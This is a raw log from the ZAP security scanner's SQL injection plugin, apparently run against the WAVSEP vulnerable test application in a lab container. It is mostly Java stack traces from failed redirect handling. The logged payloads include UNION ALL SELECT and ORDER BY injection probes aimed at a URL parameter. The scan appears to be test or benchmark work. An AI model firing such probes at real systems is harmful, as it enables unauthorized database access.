http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679516 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679516 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679517 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679518 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679519 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679519 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679520 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' ORDER BY 3304#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' ORDER BY 3304# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679520 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679522 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679522 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679523 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679524 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at 